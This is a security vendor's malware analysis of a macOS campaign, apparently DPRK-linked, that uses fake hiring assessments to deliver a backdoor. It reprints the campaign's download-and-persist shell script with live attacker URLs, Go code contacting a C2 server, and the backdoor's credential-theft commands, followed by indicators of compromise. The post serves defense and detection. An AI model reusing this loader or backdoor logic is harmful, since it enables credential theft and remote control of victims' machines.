Beware of fake job assessments that ask you to run Terminal commands — they could be a social engineering scheme to deploy the FlexibleFerret malware and steal your credentials. Jamf Threat Labs analyzes their latest discovery.
Author: Ferdous Saljooki
Introduction
Early in 2025, a SentinelOne blog post brought to light a malware family known as FlexibleFerret. This malware family is attributed to DPRK-aligned operators and tied to fake recruitment lures associated with the Contagious Interview operation. In this operation, individuals are led through staged hiring tasks that result in the execution of malicious instructions.
Earlier this month, Validin released a blog highlighting the details of an attack that they identified as a new variant of the Contagious Interview campaign. Jamf Threat Labs has been tracking similar activity stemming from in-the-wild detections that began with the execution of a script called /var/tmp/macpatch.sh. This script matched indicators of the previously used FlexibleFerret shell loader. Subsequent threat hunting on VirusTotal surfaced several recently uploaded JavaScript files referencing this shell script. Each of these JavaScript files had low detections, providing an opportunity to analyze the latest iteration of FlexibleFerret.
VirusTotal listings
Social engineering and stage one
These JavaScript files are used on fake recruitment websites created by the attacker. One such example was evaluza[.]com. The websites are first designed to convince a user that a potential job exists for them and that they must complete a hiring assessment to be considered. A LinkedIn user publicly reported receiving a nearly identical lure, describing how they were asked to upload a video introduction and provide personal details through the same domain.
LinkedIn post highlighting recruitment scams
In addition to evaluza[.]com, a separate JavaScript file references proficiencycert[.]com, which hosts another recruitment-themed lure. A unique application link identified during analysis, proficiencycert[.]com/apply/o5s3x9e7i4w1mwie3h6j3ygf, presents a staged hiring assessment branded as “Blockchain Capital Operations Manager Hiring Assessment.” The JavaScript includes a broad catalog of job lures and selects a matching role and company based on the apply link to tailor the page to the intended target.
The page instructs the visitor to begin a timed assessment and lists job responsibilities, mirroring the type of professional context used to socially engineer targets.
Hiring assessment
After filling out the job assessment, applicants are then asked to record a video introduction on a fake assessment portal and then execute a provided macOS command in the Terminal, which initiates the malware on the victim’s system. This activity reflects many of the social engineering techniques used in previous Contagious Interview operations (such as that reported by researcher tayvano).
In one of the JavaScript samples analyzed by Jamf Threat Labs, the attacker attempts to persuade the victim to execute the curl command by claiming that camera or microphone access is blocked, presenting the curl command as the required fix.
Prompt for camera and microphone access
The command built by the JavaScript combines several variables to produce a curl command that downloads a secondary payload to /var/tmp/macpatch.sh, marks it executable, and launches it in the background.
Secondary payload fetched by the curl command
Stage two
Using the URL components extracted in stage one, the second‑stage download path can be constructed:
hXXps://app.zynoracreative.com/updrv8/drvMac-as7t.patch
Retrieving this file reveals the next-stage shell script (macpatch.sh, also uploaded as cdrivMac.sh).
#!/bin/bash
ZIP_URL_ARM64_9990as7t="https://app.zynoracreative.com/updrv8/drv-Arm64.patch"
ZIP_URL_INTEL_9990as7t="https://app.zynoracreative.com/updrv8/drv-Intel.patch"
ZIP_FILE_9990as7t="/var/tmp/CDrivers.zip"
WORK_DIR_9990as7t="/var/tmp/CDrivers"
EXECUTABLE_9990as7t="drivfixer.sh"
APP_9990as7t="MediaPatcher.APP"
PLIST_FILE_9990as7t=~/Library/LaunchAgents/com.driver9990as7tpatch.plist
ACTION1_9990as7t="RunAt""Load "
ACTION2_9990as7t="KeepA""live "
# Determine CPU architecture
case $(uname -m) in
arm64) ZIP_URL=$ZIP_URL_ARM64_9990as7t ;;
x86_64) ZIP_URL=$ZIP_URL_INTEL_9990as7t ;;
*) exit 1 ;; # Exit for unsupported architectures
esac
# Create working directory
mkdir -p "$WORK_DIR_9990as7t"
# Function to clean up
cleanup() {
rm -rf "$ZIP_FILE_9990as7t"
}
# Download, unzip, and execute
if curl -s -o "$ZIP_FILE_9990as7t" "$ZIP_URL" && [[ -f "$ZIP_FILE_9990as7t" ]]; then
unzip -o -qq "$ZIP_FILE_9990as7t" -d "$WORK_DIR_9990as7t"
if [[ -f "$WORK_DIR_9990as7t/$EXECUTABLE_9990as7t" ]]; then
chmod +x "$WORK_DIR_9990as7t/$EXECUTABLE_9990as7t"
"$WORK_DIR_9990as7t/$EXECUTABLE_9990as7t" &
else
cleanup
exit 1
fi
else
cleanup
exit 1
fi
# Step 4: Register the service
mkdir -p ~/Library/LaunchAgents
cat > "$PLIST_FILE_9990as7t"
Label
com.webcam
ProgramArguments
$WORK_DIR_9990as7t/$EXECUTABLE_9990as7t
${ACTION1_9990as7t}
EOL
chmod 644 "$PLIST_FILE_9990as7t"
if ! launchctl list | grep -q "com.webcam"; then
launchctl load "$PLIST_FILE_9990as7t"
fi
# Step 5: Run ChromeUpdateAlert.APP_9990as7t
if [[ -d "$WORK_DIR_9990as7t/$APP_9990as7t" ]]; then
open "$WORK_DIR_9990as7t/$APP_9990as7t" &
fi
# Final cleanup
cleanup
The script performs the following actions:
1. Determines the host architecture
The script first branches on uname -m to decide which payload to fetch:
- arm64 hosts:
hXXps://app.zynoracreative.com/updrv8/drv-Arm64.patch - Intel hosts:
hXXps://app.zynoracreative.com/updrv8/drv-Intel.patch
2. Downloads and unpacks the stage three backdoor
The chosen archive is written to /var/tmp/CDrivers.zip and extracted into /var/tmp/CDrivers. If the expected loader (drivfixer.sh) is present, the script marks it executable and launches it in the background.
3. Establishes persistence
The script writes a LaunchAgent to~/Library/LaunchAgents/com.driver9990as7tpatch.plist
The plist points to the extracted loader (drivfixer.sh) inside /var/tmp/CDrivers and is intended to run at login.
4. Displays a decoy application to harvest credentials
If the extracted directory contains the ad-hoc signed application MediaPatcher.app, the script launches it.
Ad-hoc signed MediaPatcher.app
The decoy application first shows a fake Chrome camera access prompt to establish legitimacy. It then presents a Chrome-style password prompt, capturing whatever the user enters and sends it to a Dropbox account.
Left: fake Chrome camera access prompt | Right: Chrome-style password prompt
In this variant, the Dropbox exfiltration host is constructed by concatenating short string fragments to form content.dropboxapi.com. The malware uses Dropbox’s legitimate file upload API as its exfiltration channel for passwords, issuing an authenticated POST request to content.dropboxapi.com/2/files/upload. It also queries api.ipify.org to obtain the victim’s public IP address, consistent with earlier FlexibleFerret activity.
Constructing the exfiltration host via concatenation
Stage three
The third stage begins when the previously downloaded archive (/var/tmp/CDrivers.zip) is extracted, and its loader script (drivfixer.sh) is executed.
The extracted directory contains a malicious Golang project named CDrivers, which closely mirrors the structure and functionality of the backdoor previously analyzed by researcher dmpdump.
Extracted directory with malicious Golang project
The loader script(drivfixer.sh)simply invokes the Go source file driv.go using the bundled Go runtime.
Script invoking the Go source file
Upon execution of driv.go it generates a 4‑byte random machine identifier and stores it in a .host file under the user’s temporary directory, reusing it on subsequent runs. Before executing, it performs delay and duplicate‑instance checks, then registers itself as the active instance. Finally, it contacts the hard‑coded C2 server at hXXp://95.169.180.140:8080 and begins the first communication loop by invoking core.StartFirst5179Iter() with the machine ID and C2 url.
func RunDLL_5179_Main() {
instance.Delay()
instance.CheckDup_5179_Instance()
instance.Register_5179_Instance()
//url := "https://api.jz-aws.info/public/images/"
url := "http://95.169.180."+"140:8080"
// url := "http://127.0.0.1:8080"
id := generate_5179_UUID()
core.StartFirst5179Iter(id, url)
}
//export DllRegisterServer
// func DllRegisterServer() {
// RunDLL()
// }
// main
func main() {
RunDLL_5179_Main()
}
The backdoor’s command loop
The Go backdoor then enters a persistent command-processing loop implemented in StartFirst5179Iter. Each iteration performs the following actions:
1. Execute the current command handler
The loop invokes the handler associated with the current command type. Each handler returns:
msg_5179_type— the response message type to send backmsg_5179_data— the response payload as a set of byte slices
Supported command types are defined in the configuration file loaded by the backdoor and mapped to four-character identifiers. Some of the interesting ones are as follows:
qwer— collect system information (username, hostname, OS, architecture)asdf— file upload: receive an archive from the C2 and extract it to diskzxcv— file download: read a file or directory and return the bytesvbcx— execute an OS command, either synchronously with a timeout or asynchronously in detached moder4ys— automated stealing modes89io— gather Chrome profile and extension metadata7ujm— placeholder on macOS (not implemented)gi%#— enumerate Chrome Local Extension Settings directorieskyci— collect Chrome Login Data DB and the related keychain file for exfiltration
ghdj— sleep/pingdghh— terminate the process
2. Wrap and send the response
The backdoor constructs the outbound message using the machine ID, message type and payload, then delivers it to the C2 using the Htxp_Exchange function.
3. Decode the next C2 command
The response from the C2 is decoded into a command identifier and a list of positional byte-slice arguments, which define what the next loop iteration will execute.
cmd_5179_type— command identifiercmd_5179_data— arguments as positional byte slices
4. Error handling and fallback
The loop is wrapped in a recover() block. If a panic occurs during a handler, the malware resets the command type back to the system-information command (qwer) and sleeps for five minutes before continuing. This ensures that temporary failures do not break execution.
Conclusion
This campaign reinforces that FlexibleFerret remains an active threat on macOS, relying on convincing recruitment lures to move targets from a fake hiring flow into running attacker-provided commands in the Terminal that circumvent built-in protections like Gatekeeper. Our analysis links the JavaScript stagers to a familiar multi-stage attack and shows that the threat actor continues refining their social engineering to blend into legitimate-looking processes. Organizations should treat unsolicited “interview” assessments and Terminal-based “fix” instructions as high risk and ensure users know to stop and report these prompts as they continue to become more abundant in the threat landscape.
Indicators of compromise (IoCs)
Stage One (JavaScript Stager):
fa0022f19c01c56beffe1447e6d62358e770deffe53e39010d6b7ca7b5c87209
(hXXps://app.compassidea.org/vcamv8/drvMac-an5r.patch)
7c1e5f1fadd194555a77f13105b988c0f2994b741e932837228fe47bc30d8dcf
(hXXps://app.compassidea.org/vcamv8/drvMac-an5r.patch)
0267702a659b7e6b8ae0ce994ad3e6d426747f1a1c199a89398622d0189b56d0
(hXXps://app.zynoracreative.com/updrv8/drvMac-as7t.patch)
14a56d6381c1ee8e0561da1fbdb895e6ba70578245fc43177f0b4635a155ee84
(hXXps://app.proficiencycert.com/toolCamV8/drvMac-cb5h.patch)
8cacecc1d0da29a5928f73d5b1c1301c6e78300cc6b78db787acdb19f1eaaec3
(hXXps://app.evaluino.com/v86/drvMac-an5r.patch)
d9ee3e3af1c57022ba1e843d78ec2b4fb6cb8a65b7eecab9b94c5f4b34338e8d
(hXXps://app.evaluza.com/hbrev1023/drvMac-tk5i.patch)
Stage Two (Shell Script and Decoy App):
4faf567238e22a6217270c550aa9437141e693eb28bbf460c9996071fda0ab05 - macpatch.sh
159046fd26701315cfd79bd392a8fa05d4bcae47cfa2409f03628b823cb477c4 - MediaPatcher
Stage Three (Backdoored Go Project):
01a8ae878073d950abd6cf70d8e266a4cbefad9b4de6c256b2516bdbd11cbfe8 - CDrivers.zip
Domains/IPs:
95.169.180[.]140:8080
compassidea[.]org
zynoracreative[.]com
proficiencycert[.]com
evaluino[.]com
evaluza[.]com
Download URLs (Stage Two Shell Script):
hXXps://app.compassidea.org/vcamv8/drvMac-an5r.patch
hXXps://app.compassidea.org/vcamv8/drvMac-an5r.patch
hXXps://app.zynoracreative.com/updrv8/drvMac-as7t.patch
hXXps://app.proficiencycert.com/toolCamV8/drvMac-cb5h.patch
hXXps://app.evaluino.com/v86/drvMac-an5r.patch
hXXps://app.evaluza.com/hbrev1023/drvMac-tk5i.patch
Download URLs (Stage Three Backdoored Go Project)
hXXps://app.zynoracreative.com/updrv8/drv-Arm64.patch
hXXps://app.zynoracreative.com/updrv8/drv-Intel.patch
Paths:
/var/tmp/macpatch.sh
/var/tmp/CDrivers
/var/tmp/CDrivers.zip
~/Library/LaunchAgents/com.driver9990as7tpatch.plist
Dive into more Jamf Threat Labs research on our blog.
